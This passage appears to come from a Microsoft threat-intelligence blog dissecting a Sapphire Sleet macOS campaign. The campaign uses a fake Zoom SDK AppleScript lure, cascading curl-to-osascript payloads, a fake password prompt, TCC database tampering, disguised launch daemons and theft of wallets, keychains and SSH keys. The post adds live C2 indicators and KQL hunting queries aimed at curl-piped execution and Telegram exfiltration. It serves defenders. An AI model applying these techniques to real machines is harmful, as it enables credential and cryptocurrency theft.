The malicious Zoom SDK Update.scpt file is crafted to appear as a legitimate Zoom SDK update when opened in the macOS Script Editor app, beginning with a large decoy comment block that mimics benign upgrade instructions and gives the impression of a routine software update. To conceal its true behavior, the script inserts thousands of blank lines immediately after this visible content, pushing the malicious logic far below the scrollable view of the Script Editor window and reducing the likelihood that a user will notice it.

Hidden beneath this decoy, the script first launches a harmless looking command that invokes the legitimate macOS softwareupdate binary with an invalid parameter, an action that performs no real update but launches a trusted Apple‑signed process to reinforce the appearance of legitimacy. Following this, the script executes its malicious payload by using curl to retrieve threat actor‑controlled content and immediately passes the returned data to osascript for execution using the run script result instruction. Because the content fetched by curl is itself a new AppleScript, it is launched directly within the Script Editor context, initiating a payload delivery in which additional stages are dynamically downloaded and executed.

Screenshot of a code editor showing a script for updating Zoom Meeting SDK with comments about a new Zoom Web App release and instructions for manual SDK upgrade. The script includes a URL for SDK setup, a shell command to update software, and a highlighted note indicating presence of a malicious payload hidden below the visible editor area.
Figure 2. The AppleScript lure with decoy content and payload execution

Execution and payload delivery

Cascading curl-to-osascript execution

When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain. From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.

Flowchart diagram illustrating a multi-stage malware attack process starting from a script editor executing various curl commands and AppleScripts, leading to backdoor deployments along with a credential harvester and host monitoring component.
Figure 3. Process tree showing cascading execution from Script Editor

The main payload fetched by the mac-cur1 user agent is the attack orchestrator. Once executed within the Script Editor, it performs immediate reconnaissance, then kicks off parallel operations using additional curl commands with different user-agent strings.

Note the URL path difference: mac-cur1 through mac-cur3 fetch from /version/ (AppleScript payloads piped directly to osascript for execution), while mac-cur4 and mac-cur5 fetch from /status/ (ZIP archives containing compiled macOS .app bundles).

The following table summarizes the curl chain used in this campaign.

User agentURL pathPurpose
mac-cur1/fix/mac/update/version/Main orchestrator (piped to osascript) beacon. Downloads com.apple.cli host monitoringcomponent and services backdoor
mac-cur2/fix/mac/update/version/Invokes curl with mac-cur4 which downloads credential harvester systemupdate.app
mac-cur3/fix/mac/update/version/TCC bypass + data collection + exfiltration (wallets, browser, keychains, history, Apple Notes, Telegram)
mac-cur4/fix/mac/update/status/Downloads credential harvester systemupdate.app (ZIP)
mac-cur5/fix/mac/update/status/Downloads decoy completion prompt softwareupdate.app (ZIP)
Screenshot of a script editor displaying a Zoom SDK update script with process ID 10015. The script includes multiple cURL commands, Rosetta check, and a main payload section indicating potential malicious activity branching from the execution point.
Figure 4. The curl chain showing user-agent strings and payload routing

Reconnaissance and C2 registration

After execution, the malware next identifies and registers the compromised device with Sapphire Sleet infrastructure. The malware starts by collecting basic system details such as the current user, host name, system time, and operating system install date. This information is used to uniquely identify the compromised device and track subsequent activity.

The malware then registers the compromised system with its command‑and‑control (C2) infrastructure. The mid value represents the device’s universally unique identifier (UUID), the did serves as a campaign‑level tracking identifier, and the user field combines the system host name with the device serial number to uniquely label the targeted user.

Screenshot of a terminal command using curl to send a POST request with JSON data to an API endpoint. The JSON payload includes fields like mid, did, user, osVersion, timezone, installdate, and proclist, with several values redacted for privacy.
Figure 5. C2 registration with device UUID and campaign identifier

Host monitoring component: com.apple.cli

The first binary deployed is a host monitoring component called com.apple.cli—a ~5 MB Mach-O binary disguised with an Apple-style naming convention.

The mac-cur1 payload spawns an osascript that downloads and launches com.apple.cli:

Screenshot of a code snippet showing a script designed to execute shell commands for downloading and running a payload, including setting usernames and handling errors.
Figure 6. com.apple.cli deployment using osascript

The host monitoring component repeatedly executes a series of system commands to collect environment and runtime information, including the macOS version (sw_vers), the current system time (date -u), and the underlying hardware model (sysctl hw.model). It then runs ps aux in a tight loop to capture a full, real‑time list of running processes.

During execution, com.apple.cli performs host reconnaissance while maintaining repeated outbound connectivity to the threat actor‑controlled C2 endpoint 83.136.208[.]246:6783. The observed sequencing of reconnaissance activity and network communication is consistent with staging for later operational activity, including privilege escalation, and exfiltration.

In parallel with deploying com.apple.cli, the mac-cur1 orchestrator also deploys a second component, the services backdoor, as part of the same execution flow; its role in persistence and follow‑on activity is described later in this blog.

Credential access

Credential harvester: systemupdate.app

After performing reconnaissance, the mac-cur1 orchestrator begins parallel operations. During the mac‑cur2 stage of execution (independent from the mac-cur1 stage), Sapphire Sleet delivers an AppleScript payload that is executed through osascript. This stage is responsible for deploying the credential harvesting component of the attack.

Before proceeding, the script checks for the presence of a file named .zoom.log on the system. This file acts as an infection marker, allowing Sapphire Sleet to determine whether the device has already been compromised. If the marker exists, deployment is skipped to avoid redundant execution across sessions.

If the infection marker is not found, the script downloads a compressed archive through the mac-cur4 user agent that contains a malicious macOS application named (systemupdate.app), which masquerades as the legitimate system update utility by the same name. The archive is extracted to a temporary location, and the application is launched immediately.

When systemupdate.app launches, the user is presented with a native macOS password dialog that is visually indistinguishable from a legitimate system prompt. The dialog claims that the user’s password is required to complete a software update, prompting the user to enter their credentials.

After the user enters their password, the malware performs two sequential actions to ensure the credential is usable and immediately captured. First, the binary validates the entered password against the local macOS authentication database using directory services, confirming that the credential is correct and not mistyped. Once validation succeeds, the verified password is immediately exfiltrated to threat actor‑controlled infrastructure using the Telegram Bot API, delivering the stolen credential directly to Sapphire Sleet.

Figure 7. Password popup given by fake systemupdate.app

Decoy completion prompt: softwareupdate.app

After credential harvesting is completed using systemupdate.app, Sapphire Sleet deploys a second malicious application named softwareupdate.app, whose sole purpose is to reinforce the illusion of a legitimate update workflow. This application is delivered during a later stage of the attack using the mac‑cur5 user‑agent. Unlike systemupdate.app, softwareupdate.app does not attempt to collect credentials. Instead, it displays a convincing “system update complete” dialog to the user, signaling that the supposed Zoom SDK update has finished successfully. This final step closes the social engineering loop: the user initiated a Zoom‑themed update, was prompted to enter their password, and is now reassured that the process completed as expected, reducing the likelihood of suspicion or further investigation.

Persistence

Primary backdoor and persistence installer: services binary

The services backdoor is a key operational component in this attack, acting as the primary backdoor and persistence installer. It provides an interactive command execution channel, establishes persistence using a launch daemon, and deploys two additional backdoors. The services backdoor is deployed through a dedicated AppleScript executed as part of the initial mac‑cur1 payload that also deployed com.apple.cli, although the additional backdoors deployed by services are executed at a later stage.

During deployment, the services backdoor binary is first downloaded using a hidden file name (.services) to reduce visibility, then copied to its final location before the temporary file is removed. As part of installation, the malware creates a file named auth.db under ~/Library/Application Support/Authorization/, which stores the path to the deployed services backdoor and serves as a persistent installation marker. Any execution or runtime errors encountered during this process are written to /tmp/lg4err, leaving behind an additional forensic artifact that can aid post‑compromise investigation.

Screenshot of a code snippet written in a scripting language, focused on setting variables, file paths, and executing shell commands for downloading and managing files.
Figure 8. Services backdoor deployment using osascript

Unlike com.apple.cli, the services backdoor uses interactive zsh shells (/bin/zsh -i) to execute privileged operations. The -i flag creates an interactive terminal context, which is required for sudo commands that expect interactive input.

Screenshot of terminal commands and script annotations related to installing and configuring persistence for icloudz malware. Commands include environment checks, anti-sleep measures, OS version beacon, credential harvester deletion, self-copy creation, and five persistence installation steps with file paths, permissions, and launchctl commands.
Figure 9. Interactive zsh shell execution by the services backdoor

Additional backdoors: icloudz and com.google.chromes.updaters

Of the additional backdoors deployed by services, the icloudz backdoor is a renamed copy of the previously deployed services backdoor and shares the same SHA‑256 hash, indicating identical underlying code. Despite this, it is executed using a different and more evasive technique. Although icloudz shares the same binary as .services, it operates as a reflective code loader—it uses the macOS NSCreateObjectFileImageFromMemory API to load additional payloads received from its C2 infrastructure directly into memory, rather than writing them to disk and executing them conventionally.

The icloudz backdoor is stored at ~/Library/Application Support/iCloud/icloudz, a location and naming choice intended to resemble legitimate iCloud‑related artifacts. Once loaded into memory, two distinct execution waves are observed. Each wave independently initializes a consistent sequence of system commands: existing caffeinate processes are stopped, caffeinate is relaunched using nohup to prevent the system from sleeping, basic system information is collected using sw_vers and sysctl -n hw.model, and an interactive /bin/zsh -i shell is spawned. This repeated initialization suggests that the component is designed to re‑establish execution context reliably across runs.

From within the interactive zsh shell, icloudz deploys an additional (tertiary) backdoor, com.google.chromes.updaters, to disk at ~/Library/Google/com.google.chromes.updaters. The selected directory and file name closely resemble legitimate Google application data, helping the file blend into the user’s Home directory and reducing the likelihood of casual inspection. File permissions are adjusted; ownership is set to allow execution with elevated privileges, and the com.google.chromes.updaters binary is launched using sudo.

To ensure continued execution across reboots, a launch daemon configuration file named com.google.webkit.service.plist is installed under /Library/LaunchDaemons. This configuration causes icloudz to launch automatically at system startup, even if no user is signed in. The naming convention deliberately mimics legitimate Apple and Google system services, further reducing the chance of detection.

The com.google.chromes.updaters backdoor is the final and largest component deployed in this attack chain, with a size of approximately 7.2 MB. Once running, it establishes outbound communication with threat actor‑controlled infrastructure, connecting to the domain check02id[.]com over port 5202. The process then enters a precise 60‑second beaconing loop. During each cycle, it executes minimal commands such as whoami to confirm the execution context and sw_vers -productVersion to report the operating system version. This lightweight heartbeat confirms the process remains active, is running with elevated privileges, and is ready to receive further instructions.

Privilege escalation

TCC bypass: Granting AppleEvents permissions

Before large‑scale data access and exfiltration can proceed, Sapphire Sleet must bypass macOS TCC protections. TCC enforces user consent for sensitive inter‑process interactions, including AppleEvents, the mechanism required for osascript to communicate with Finder and perform file-level operations. The mac-cur3 stage silently grants itself these permissions by directly manipulating the user-level TCC database through the following sequence.

The user-level TCC database (~/Library/Application Support/com.apple.TCC/TCC.db) is itself TCC-protected—processes without Full Disk Access (FDA) cannot read or modify it. Sapphire Sleet circumvents this by directing Finder, which holds FDA by default on macOS,  to rename the com.apple.TCC folder. Once renamed, the TCC database file can be copied to a staging location by a process without FDA.

Sapphire Sleet then uses sqlite3 to inject a new entry into the database’s access table. This entry grants /usr/bin/osascript permission to send AppleEvents to com.apple.finder and includes valid code-signing requirement (csreq) blobs for both binaries, binding the grant to Apple-signed executables. The authorization value is set to allowed (auth_value=2) with a user-set reason (auth_reason=3), ensuring no user prompt is triggered. The modified database is then copied back into the renamed folder, and Finder restores the folder to its original name. Staging files are deleted to reduce forensic traces.

Screenshot of a code snippet showing an SQLite3 command to insert data into an access table with columns for service, client, client_type, auth_value, and other attributes.
Figure 10. Overwriting original TCC database with modified version

Collection and exfiltration

With TCC bypassed, credentials stolen, and backdoors deployed, Sapphire Sleet launches the next phase of attack: a 575-line AppleScript payload that systematically collects, stages, compresses, and exfiltrates seven categories of data.

Exfiltration architecture

Every upload follows a consistent pattern and is executed using nohup, which allows the command to continue running in the background even if the initiating process or Terminal session exits. This ensures that data exfiltration can complete reliably without requiring the threat actor to maintain an active session on the system.

The auth header provides the upload authorization token, and the mid header ties the upload to the compromised device’s UUID.

Screenshot of a terminal window showing a shell command sequence for zipping and uploading a file. Commands include compressing a directory, removing temporary files, and using curl with headers for authentication and file upload to a specified IP address and port.
Figure 11. Exfiltration upload pattern with nohup

Data collected during exfiltration

  • Host and system reconnaissance: Before bulk data collection begins, the script records basic system identity and hardware information. This includes the current username, system host name, macOS version, and CPU model. These values are appended to a per‑host log file and provide Sapphire Sleet with environmental context, hardware fingerprinting, and confirmation of the target system’s characteristics. This reconnaissance data is later uploaded to track progress and correlate subsequent exfiltration stages to a specific device.
  • Installed applications and runtime verification: The script enumerates installed applications and shared directories to build an inventory of the system’s software environment. It also captures a live process listing filtered for threat actor‑deployed components, allowing Sapphire Sleet to verify that earlier payloads are still running as expected. These checks help confirm successful execution and persistence before proceeding further.
  • Messaging session data (Telegram): Telegram Desktop session data is collected by copying the application’s data directories, including cryptographic key material and session mapping files. These artifacts are sufficient to recreate the user’s Telegram session on another system without requiring reauthentication. A second collection pass targets the Telegram App Group container to capture the complete local data set associated with the application.
  • Browser data and extension storage: For Chromium‑based browsers, including Chrome, Brave, and Arc, the script copies browser profiles and associated databases. This includes saved credentials, cookies, autofill data, browsing history, bookmarks, and extension‑specific storage. Particular focus is placed on IndexedDB entries associated with cryptocurrency wallet extensions, where wallet keys and transaction data are stored. Only IndexedDB entries matching a targeted set of wallet extension identifiers are collected, reflecting a deliberate and selective approach.
  • macOS keychain: The user’s sign-in keychain database is bundled alongside browser data. Although the keychain is encrypted, Sapphire Sleet has already captured the user’s password earlier in the attack chain, enabling offline decryption of stored secrets once exfiltrated.
  • Cryptocurrency desktop wallets: The script copies the full application support directories for popular cryptocurrency desktop wallets, including Ledger Live and Exodus. These directories contain wallet configuration files and key material required to access stored cryptocurrency assets, making them high‑value targets for exfiltration.
  • SSH keys and shell history: SSH key directories and shell history files are collected to enable potential lateral movement and intelligence gathering. SSH keys may provide access to additional systems, while shell history can reveal infrastructure details, previously accessed hosts, and operational habits of the targeted user.
  • Apple Notes: The Apple Notes database is copied from its application container and staged for upload. Notes frequently contain sensitive information such as passwords, internal documentation, infrastructure details, or meeting notes, making them a valuable secondary data source.
  • System logs and failed access attempts: System log files are uploaded directly without compression. These logs provide additional hardware and execution context and include progress markers that indicate which exfiltration stages have completed. Failed collection attempts—such as access to password manager containers that are not present on the system—are also recorded and uploaded, allowing Sapphire Sleet to understand which targets were unavailable on the compromised host.

Exfiltration summary

#Data categoryZIP nameUpload portEstimated sensitivity
1Telegram sessiontapp_<user>.zip8443Critical — session hijack
2Browser data + Keychainext_<user>.zip8443Critical — all passwords
3Ledger walletldg_<user>.zip8443Critical — crypto keys
4Exodus walletexds_<user>.zip8443Critical — crypto keys
5SSH + shell historyhs_<user>.zip8443High — lateral movement
6Apple Notesnt_<user>.zip8443Medium-High
7System loglg_<user> (no zip)8443Low — fingerprinting
8Recon logflog (no zip)8443Low — inventory
9CredentialsTelegram message443 (Telegram API)Critical — sign-in password

All uploads use the upload authorization token fwyan48umt1vimwqcqvhdd9u72a7qysi and the machine identifier 82cf5d92-87b5-4144-9a4e-6b58b714d599.

Defending against Sapphire Sleet intrusion activity

As part of a coordinated response to this activity, Apple has implemented platform-level protections to help detect and block infrastructure and malware associated with this campaign. Apple has deployed Apple Safe Browsing protections in Safari to detect and block malicious infrastructure associated with this campaign. Users browsing with Safari benefit from these protections by default. Apple has also deployed XProtect signatures to detect and block the malware families associated with this campaign—macOS devices receive these signature updates automatically.

Microsoft recommends the following mitigation steps to defend against this activity and reduce the impact of this threat:

  • Educate users about social engineering threats originating from social media and external platforms, particularly unsolicited outreach requesting software downloads, virtual meeting tool installations, or execution of terminal commands. Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams.
  • Block or restrict the execution of .scpt (compiled AppleScript) files and unsigned Mach-O binaries downloaded from the internet. Where feasible, enforce policies that prevent osascript from executing scripts sourced from external locations.
  • Always inspect and verify files downloaded from external sources, including compiled AppleScript (.scpt) files. These files can execute arbitrary shell commands via macOS Script Editor—a trusted first-party Apple application—making them an effective and stealthy initial access vector.
  • Limit or audit the use of curl piped to interpreters (such as curl | osascript, curl | sh, curl | bash). Social engineering campaigns by Sapphire Sleet rely on cascading curl-to-interpreter chains to avoid writing payloads to disk. Organizations should monitor for and restrict piped execution patterns originating from non-standard user-agent strings.
  • Exercise caution when copying and pasting sensitive data such as wallet addresses or credentials from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
  • Monitor for unauthorized modifications to the macOS TCC database. This campaign manipulates TCC.db to grant AppleEvents permissions to osascript without user consent—a prerequisite for the large-scale data exfiltration phase. Look for processes copying, modifying, or overwriting ~/Library/Application Support/com.apple.TCC/TCC.db.
  • Audit LaunchDaemon and LaunchAgent installations. This campaign installs a persistent launch daemon (com.google.webkit.service.plist) that masquerades as a legitimate Google or Apple service. Monitor /Library/LaunchDaemons/ and ~/Library/LaunchAgents/ for unexpected plist files, particularly those with com.google.* or com.apple.* naming conventions not belonging to genuine vendor software.
  • Protect cryptocurrency wallets and browser credential stores. This campaign targets nine specific crypto wallet extensions (Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, Backpack) plus Bitwarden, and exfiltrates browser sign-in data, cookies, and keychain databases. Organizations handling digital assets should enforce hardware wallet policies and rotate browser-stored credentials regularly.
  • Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.

Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:

Microsoft Defender detection and hunting guidance

Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Tactic Observed activity Microsoft Defender coverage 
Initial access– Malicious .scpt file execution (Zoom SDK Update lure)Microsoft Defender Antivirus
– Trojan:MacOS/SuspMalScript.C
– Trojan:MacOS/FlowOffset.A!dha
 
Microsoft Defender for Endpoint
– Sapphire Sleet actor activity
– Suspicious file or content ingress
Execution– Malicious osascript execution
– Cascading curl-to-osascript chains
– Malicious binary execution
Microsoft Defender Antivirus
– Trojan:MacOS/SuspMalScript.C
– Trojan:MacOS/SuspInfostealExec.C
– Trojan:MacOS/NukeSped.D
 
Microsoft Defender for Endpoint
– Suspicious file dropped and launched
– Suspicious script launched
– Suspicious AppleScript activity
– Sapphire Sleet actor activity
– Hidden file executed
Persistence– LaunchDaemon installation (com.google.webkit.service.plist)Microsoft Defender for Endpoint
– Suspicious Plist modifications
– Suspicious launchctl tool activity
Defense evasion– TCC database manipulation
– Reflective code loading (NSCreateObjectFileImageFromMemory)
Microsoft Defender for Endpoint
– Potential Transparency, Consent and Control bypass
– Suspicious database access
Credential access– Fake password dialog (systemupdate.app, softwareupdate.app)
– Keychain exfiltration
Microsoft Defender Antivirus
– Trojan:MacOS/PassStealer.D
– Trojan:MacOS/FlowOffset.D!dha
– Trojan:MacOS/FlowOffset.E!dha  

Microsoft Defender for Endpoint
– Suspicious file collection
Collection and exfiltration– Browser data, crypto wallets, Telegram session, SSH keys, Apple Notes theft
– Credential exfiltration using Telegram Bot API
Microsoft Defender Antivirus
– Trojan:MacOS/SuspInfostealExec.C
 
Microsoft Defender for Endpoint
– Enumeration of files with sensitive data
– Suspicious File Copy Operations Using CoreUtil
– Suspicious archive creation
– Remote exfiltration activity
– Possible exfiltration of archived data
Command and control– Mach-O backdoors beaconing to C2 (com.apple.cli, services, com.google.chromes.updaters)Microsoft Defender Antivirus
– Trojan:MacOS/NukeSped.D  
– Backdoor:MacOS/FlowOffset.B!dha
– Backdoor:MacOS/FlowOffset.C!dha
 
Microsoft Defender for Endpoint
– Sapphire Sleet actor activity  
– Network connection by osascript

Microsoft Security Copilot

Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.

Customers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:

Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.

Threat intelligence reports

Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR threat analytics

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following advanced hunting queries to find related activity in their networks:

Suspicious osascript execution with curl piping

Search for curl commands piping output directly to osascript, a core technique in this Sapphire Sleet campaign’s cascading payload delivery chain.

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where FileName == "osascript" or InitiatingProcessFileName == "osascript"
 | where ProcessCommandLine has "curl" and ProcessCommandLine has_any ("osascript", "| sh", "| bash")
 | project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessFileName

Suspicious curl activity with campaign user-agent strings

Search for curl commands using user-agent strings matching the Sapphire Sleet campaign tracking identifiers (mac-cur1 through mac-cur5, audio, beacon).

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where FileName == "curl" or ProcessCommandLine has "curl"
 | where ProcessCommandLine has_any ("mac-cur1", "mac-cur2", "mac-cur3", "mac-cur4", "mac-cur5", "-A audio", "-A beacon")
 | project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Detect connectivity with known C2 infrastructure

Search for network connections to the Sapphire Sleet C2 domains and IP addresses used in this campaign.

let c2_domains = dynamic(["uw04webzoom.us", "uw05webzoom.us", "uw03webzoom.us", "ur01webzoom.us", "uv01webzoom.us", "uv03webzoom.us", "uv04webzoom.us", "ux06webzoom.us", "check02id.com"]);
 let c2_ips = dynamic(["188.227.196.252", "83.136.208.246", "83.136.209.22", "83.136.208.48", "83.136.210.180", "104.145.210.107"]);
 DeviceNetworkEvents
 | where Timestamp > ago(30d)
 | where RemoteUrl has_any (c2_domains) or RemoteIP in (c2_ips)
 | project Timestamp, DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine

TCC database manipulation detection

Search for processes that copy, modify, or overwrite the macOS TCC database, a key defense evasion technique used by this campaign to grant unauthorized AppleEvents permissions.

DeviceFileEvents
 | where Timestamp > ago(30d)
 | where FolderPath has "com.apple.TCC" and FileName == "TCC.db"
 | where ActionType in ("FileCreated", "FileModified", "FileRenamed")
 | project Timestamp, DeviceId, DeviceName, ActionType, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine

Suspicious LaunchDaemon creation masquerading as legitimate services

Search for LaunchDaemon plist files created in /Library/LaunchDaemons that masquerade as Google or Apple services, matching the persistence technique used by the services/icloudz backdoor.

DeviceFileEvents
 | where Timestamp > ago(30d)
 | where FolderPath startswith "/Library/LaunchDaemons/"
 | where FileName startswith "com.google." or FileName startswith "com.apple."
 | where ActionType == "FileCreated"
 | project Timestamp, DeviceId, DeviceName, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA256

Malicious binary execution from suspicious paths

Search for execution of binaries from paths commonly used by Sapphire Sleet, including hidden Library directories, /private/tmp/, and user-specific Application Support folders.

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where FolderPath has_any (
     "Library/Services/services",
     "Application Support/iCloud/icloudz",
     "Library/Google/com.google.chromes.updaters",
     "/private/tmp/SystemUpdate/",
     "/private/tmp/SoftwareUpdate/",
     "com.apple.cli"
 )
 | project Timestamp, DeviceId, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName, SHA256

Credential harvesting using dscl authentication check

Search for dscl -authonly commands used by the fake password dialog (systemupdate.app) to validate stolen credentials before exfiltration.

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where FileName == "dscl" or ProcessCommandLine has "dscl"
 | where ProcessCommandLine has "-authonly"
 | project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Telegram Bot API exfiltration detection

Search for network connections to Telegram Bot API endpoints, used by this campaign to exfiltrate stolen credentials.

DeviceNetworkEvents
 | where Timestamp > ago(30d)
 | where RemoteUrl has "api.telegram.org" and RemoteUrl has "/bot"
 | project Timestamp, DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine

Reflective code loading using NSCreateObjectFileImageFromMemory

Search for evidence of reflective Mach-O loading, the technique used by the icloudz backdoor to execute code in memory.

DeviceEvents
 | where Timestamp > ago(30d)
 | where ActionType has "NSCreateObjectFileImageFromMemory"
     or AdditionalFields has "NSCreateObjectFileImageFromMemory"
 | project Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, AdditionalFields

Suspicious caffeinate and sleep prevention activity

Search for caffeinate process stop-and-restart patterns used by the services and icloudz backdoors to prevent the system from sleeping during backdoor operations.

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where ProcessCommandLine has "caffeinate"
 | where InitiatingProcessCommandLine has_any ("icloudz", "services", "chromes.updaters", "zsh -i")
 | project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Detect known malicious file hashes

Search for the specific malicious file hashes associated with this Sapphire Sleet campaign across file events.

let malicious_hashes = dynamic([
     "2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419",
     "05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53",
     "5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7",
     "5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5",
     "95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63",
     "8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c",
     "a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640"
 ]);
 DeviceFileEvents
 | where Timestamp > ago(30d)
 | where SHA256 in (malicious_hashes)
 | project Timestamp, DeviceId, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine

Data staging and exfiltration activity

Search for ZIP archive creation in /tmp/ directories followed by curl uploads matching the staging-and-exfiltration pattern used for browser data, crypto wallets, Telegram sessions, SSH keys, and Apple Notes.

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where (ProcessCommandLine has "zip" and ProcessCommandLine has "/tmp/")
     or (ProcessCommandLine has "curl" and ProcessCommandLine has_any ("tapp_", "ext_", "ldg_", "exds_", "hs_", "nt_", "lg_"))
 | project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Script Editor launching suspicious child processes

Search for Script Editor (the default handler for .scpt files) spawning curl, osascript, or shell commands—the initial execution vector in this campaign.

DeviceProcessEvents
 | where Timestamp > ago(30d)
 | where InitiatingProcessFileName == "Script Editor" or InitiatingProcessCommandLine has "Script Editor"
 | where FileName has_any ("curl", "osascript", "sh", "bash", "zsh")
 | project Timestamp, DeviceId, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Detect network indicators of compromise

The following query checks for connections to the Sapphire Sleet C2 domains and IP addresses across network session data:

let lookback = 30d;
 let ioc_domains = dynamic(["uw04webzoom.us", "uw05webzoom.us", "uw03webzoom.us", "ur01webzoom.us", "uv01webzoom.us", "uv03webzoom.us", "uv04webzoom.us", "ux06webzoom.us", "check02id.com"]);
 let ioc_ips = dynamic(["188.227.196.252", "83.136.208.246", "83.136.209.22", "83.136.208.48", "83.136.210.180", "104.145.210.107"]);
 DeviceNetworkEvents
 | where TimeGenerated > ago(lookback)
 | where RemoteUrl has_any (ioc_domains) or RemoteIP in (ioc_ips)
 | summarize EventCount=count() by DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName

Detect file hash indicators of compromise

The following query searches for the known malicious file hashes associated with this campaign across file, process, and security event data:

let selectedTimestamp = datetime(2026-01-01T00:00:00.0000000Z);
 let FileSHA256 = dynamic([
     "2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419",
     "05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53",
     "5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7",
     "5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5",
     "95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63",
     "8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c",
     "a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640"
 ]);
 search in (AlertEvidence, DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceProcessEvents, DeviceNetworkEvents, SecurityEvent, ThreatIntelligenceIndicator)
 TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
 and (SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))

Detect Microsoft Defender Antivirus detections related to Sapphire Sleet

The following query searches for Defender Antivirus alerts for the specific malware families used in this campaign and joins with device information for enriched context:

let SapphireSleet_threats = dynamic([
     "Trojan:MacOS/NukeSped.D",
     "Trojan:MacOS/PassStealer.D",
     "Trojan:MacOS/SuspMalScript.C",
     "Trojan:MacOS/SuspInfostealExec.C"
 ]);
 SecurityAlert
 | where ProviderName == "MDATP"
 | extend ThreatName = tostring(parse_json(ExtendedProperties).ThreatName)
 | extend ThreatFamilyName = tostring(parse_json(ExtendedProperties).ThreatFamilyName)
 | where ThreatName in~ (SapphireSleet_threats) or ThreatFamilyName in~ (SapphireSleet_threats)
 | extend CompromisedEntity = tolower(CompromisedEntity)
 | join kind=inner (
     DeviceInfo
     | extend DeviceName = tolower(DeviceName)
 ) on $left.CompromisedEntity == $right.DeviceName
 | summarize arg_max(TimeGenerated, *) by DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, tostring(LoggedOnUsers), DeviceId, TenantId, CompromisedEntity, ProductName, Entities
